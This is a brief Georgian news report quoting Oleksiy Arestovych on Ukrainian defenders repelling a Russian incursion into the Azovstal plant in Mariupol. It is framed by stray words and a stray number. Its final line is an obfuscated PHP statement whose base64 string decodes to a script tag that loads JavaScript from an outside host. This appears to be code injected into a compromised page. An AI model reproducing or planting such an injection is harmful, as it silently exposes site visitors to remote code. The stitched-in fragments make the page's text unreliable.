celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩეველმა ოლექსი არესტოვიჩმა განაცხადა, რომ  მარიუპოლის დამცველებმა, რომლებიც "აზოვსტალს" იცავენ,  რუსი ოკუპანტების თავდასხმის მოგერიება მოახერხეს.
 
მისივე თქმით, მათ ქარხნის ტერიტორიიდან ოკუპანტებს უკან დაახევინეს. "აზოვსტალისთვის" ბრძოლა გრძელდება და უკრაინელი მებრძოლები დიდ წინააღმდეგობას უწევენ გაცილებით მრავალრიცხოვან მტერს.
 
რუსმა ოკუპანტებმა "აზოვსტალის" ტერიტორიაზე შეჭრა გუშინ შეძლეს. უკრაინის ხელისუფლების წარმომადგენლების თქმით, ეს ღალატის შედეგად მოხდა და რუსებმა ინფორმაცია ქარხანაში არსებული გვირაბების შესახებ "აზოვსტალის" ყოფილი თანამშრომლისგან მიიღეს.
 
"რუსეთის ძალები "აზოვსტალის" ტერიტორიაზე გუშინ შევიდნენ, მაგრამ ისინი ჩვენმა დამცველებმა უკან დახიეს. ამჟამად ვაჯამებთ ინფორმაციას,"- განაცხადა არესტოვიჩმა.
711
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");